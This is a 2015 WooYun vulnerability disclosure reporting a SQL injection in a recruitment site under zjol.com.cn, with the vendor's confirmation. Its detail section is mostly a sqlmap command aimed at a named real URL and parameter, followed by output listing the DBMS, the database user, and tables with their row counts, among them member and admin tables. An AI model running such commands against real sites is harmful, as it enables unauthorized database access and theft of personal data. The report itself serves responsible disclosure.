当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099588

漏洞标题:浙江在线某人才网前台注入

相关厂商:zjol.com.cn

漏洞作者: BMa

提交时间:2015-03-05 15:27

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经确认,细节仅向厂商公开
2015-03-15: 细节向核心白帽子及相关领域专家公开
2015-03-25: 细节向普通白帽子公开
2015-04-04: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

浙江在线某人才网前台注入

详细说明:

sqlmap.py -u "http://rc.z
jswrc.zjol.com.cn/index_gangwei_x_x.php?id=3105&x=2105" --risk 3
参数:ID
[09:06:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0.11
current user: 'zjswrc@localhost'
Database: zjswrc
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| info_qiye | 5176 |
| huiyuan_qiye | 2624 |
| huiyuan_geren | 2606 |
| liuyan | 2575 |
| zwf_admin_info | 630 |
| district | 500 |
| web_news | 407 |
| kan_jl | 204 |
| koufei | 74 |
| zhuanye_class | 61 |
| link | 53 |
| jl | 47 |
| loaction | 47 |
| dianji | 42 |
| yiqi_regular | 41 |
| news_class | 37 |
| pingjia | 32 |
| info_diqu | 30 |
| hangye | 25 |
| yiqi_settings | 21 |
| qq | 20 |
| mianshi | 15 |
| yiqi_article | 12 |
| shoucang | 10 |
| yiqi_product | 10 |
| vip_zifei | 8 |
| gongzi | 6 |
| yiqi_category | 6 |
| pingjia_forgr | 5 |
| zhiwei_class | 3 |
| huiyuan_qiye_file | 2 |
| vip_leixing | 2 |
| yiqi_templets | 2 |
| config | 1 |
| feiyong_ck | 1 |
| vip_sq | 1 |
| yiqi_comments | 1 |
| yiqi_link | 1 |
| yiqi_users | 1 |
| zwf_admin | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 766 |
| GLOBAL_VARIABLES | 240 |
| SESSION_VARIABLES | 240 |
| GLOBAL_STATUS | 226 |
| SESSION_STATUS | 226 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| PARTITIONS | 73 |
| TABLES | 73 |
| STATISTICS | 51 |
| KEY_COLUMN_USAGE | 46 |
| TABLE_CONSTRAINTS | 46 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 18 |
| PLUGINS | 5 |
| ENGINES | 4 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

1.jpg


2.jpg


3.jpg


4.jpg


漏洞证明:

其他的东西,没兴趣

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-05 16:11

厂商回复:

我们会尽快处理,谢谢。

最新状态:

暂无